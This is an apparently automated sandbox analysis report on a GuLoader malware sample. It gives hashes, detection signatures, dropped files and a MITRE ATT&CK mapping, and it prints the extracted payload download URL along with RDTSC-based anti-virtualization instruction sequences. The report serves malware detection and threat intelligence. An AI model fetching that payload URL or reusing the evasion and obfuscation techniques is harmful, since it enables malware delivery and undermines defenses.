Edit tour

Windows Analysis Report
3GJ6S3Kwnb

Overview

General Information

Sample Name:	3GJ6S3Kwnb (renamed file extension from none to exe)
Analysis ID:	623825
MD5:	6c6a52c18f0ca26d357f2b4430f31568
SHA1:	9b32a592e54100a67d907e2ad039b164961dc042
SHA256:	cbd91a64900eacff9502b5509769b33adb8472efadd2861d99fd95a06c5630be
Tags:	exeGuLoader
Infos:

Detection

GuLoader

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

3GJ6S3Kwnb.exe (PID: 3256 cmdline: "C:\Users\user\Desktop\3GJ6S3Kwnb.exe" MD5: 6C6A52C18F0CA26D357F2B4430F31568)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://bprbeulentechnik.ch/loader/amagidom_VRCLkUVry246.bin"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.773047400.0000000003300000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.773047400.0000000003300000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://bprbeulentechnik.ch/loader/amagidom_VRCLkUVry246.bin"}

Multi AV Scanner detection for submitted file

Source: 3GJ6S3Kwnb.exe	Virustotal: Detection: 42%			Perma Link
Source: 3GJ6S3Kwnb.exe	ReversingLabs: Detection: 24%

Source: 3GJ6S3Kwnb.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 3GJ6S3Kwnb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: DIFXAPI.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source:	Binary string: D:\P4\depot\esw\projects\azure\Maglev\DesignerBranches\ezheng\newarch\Vista-AddOn\ExtArch\bin\x64\Release\NativeAdapter.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.256271269.000000000281B000.00000004.00000800.00020000.00000000.sdmp, NativeAdapter.dll.0.dr
Source:	Binary string: D:\Stanely\00.work\03.Project\AINR2.0\_tmp\igoaudsessionmonitor\igoAudSessionMonitor\x64\Release\igoAudSessionMonitor.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr
Source:	Binary string: DIFXAPI.pdbH source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source:	Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\DesktopExtension\x64\UAP\HPPrintScanDoctorDeploymentMgr.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr
Source:	Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\DesktopExtension\x64\UAP\HPPrintScanDoctorDeploymentMgr.pdb.. source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://bprbeulentechnik.ch/loader/amagidom_VRCLkUVry246.bin

Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0B
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 3GJ6S3Kwnb.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, HPPrintScanDoctorDeploymentMgr.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0~
Source: igoAudSessionMonitor.dll.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056A8

Source: 3GJ6S3Kwnb.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameigoAudSe.dll` vs 3GJ6S3Kwnb.exe
Source: 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameigoAudSe.dll` vs 3GJ6S3Kwnb.exe
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrintScanDoctorExtension.exeR vs 3GJ6S3Kwnb.exe
Source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDIFxAPI.dllp( vs 3GJ6S3Kwnb.exe

Source: 3GJ6S3Kwnb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3GJ6S3Kwnb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3GJ6S3Kwnb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NativeAdapter.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034F7

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_00406BFE		0_2_00406BFE
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_73331BFF		0_2_73331BFF

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Process Stats: CPU usage > 98%

Source: 3GJ6S3Kwnb.exe	Virustotal: Detection: 42%
Source: 3GJ6S3Kwnb.exe	ReversingLabs: Detection: 24%

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

File read: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Jump to behavior

Source: 3GJ6S3Kwnb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

0_2_004034F7

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

File created: C:\Users\user\AppData\Local\Temp\nsi9D4A.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.troj.evad.winEXE@1/9@0/0

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404954

Source: 3GJ6S3Kwnb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: DIFXAPI.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source:	Binary string: D:\P4\depot\esw\projects\azure\Maglev\DesignerBranches\ezheng\newarch\Vista-AddOn\ExtArch\bin\x64\Release\NativeAdapter.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.256271269.000000000281B000.00000004.00000800.00020000.00000000.sdmp, NativeAdapter.dll.0.dr
Source:	Binary string: D:\Stanely\00.work\03.Project\AINR2.0\_tmp\igoaudsessionmonitor\igoAudSessionMonitor\x64\Release\igoAudSessionMonitor.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3GJ6S3Kwnb.exe, 00000000.00000002.772699080.000000000281C000.00000004.00000800.00020000.00000000.sdmp, igoAudSessionMonitor.dll.0.dr
Source:	Binary string: DIFXAPI.pdbH source: 3GJ6S3Kwnb.exe, 00000000.00000003.254238343.000000000281B000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source:	Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\DesktopExtension\x64\UAP\HPPrintScanDoctorDeploymentMgr.pdb source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr
Source:	Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\DesktopExtension\x64\UAP\HPPrintScanDoctorDeploymentMgr.pdb.. source: 3GJ6S3Kwnb.exe, 00000000.00000003.255317617.000000000281E000.00000004.00000800.00020000.00000000.sdmp, HPPrintScanDoctorDeploymentMgr.exe.0.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.773047400.0000000003300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_733330C0 push eax; ret

0_2_733330EE

Source: NativeAdapter.dll.0.dr

Static PE information: section name: .nep

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_73331BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73331BFF

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File created: C:\Users\user\AppData\Local\Temp\igoAudSessionMonitor.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File created: C:\Users\user\AppData\Local\Temp\HPPrintScanDoctorDeploymentMgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File created: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File created: C:\Users\user\AppData\Local\Temp\NativeAdapter.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File created: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	Jump to dropped file

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

RDTSC instruction interceptor: First address: 0000000003303226 second address: 0000000003303226 instructions: 0x00000000 rdtsc 0x00000002 test dx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F7EF8F15682h 0x00000009 test ch, bh 0x0000000b inc ebp 0x0000000c test ax, dx 0x0000000f inc ebx 0x00000010 rdtsc

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\igoAudSessionMonitor.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\HPPrintScanDoctorDeploymentMgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\NativeAdapter.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	Jump to dropped file

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	API call chain: ExitProcess graph end node			graph_0-4946
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	API call chain: ExitProcess graph end node			graph_0-4942

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

Code function: 0_2_73331BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73331BFF

Source: C:\Users\user\Desktop\3GJ6S3Kwnb.exe

0_2_004034F7

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	1 Access Token Manipulation	1 Access Token Manipulation	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
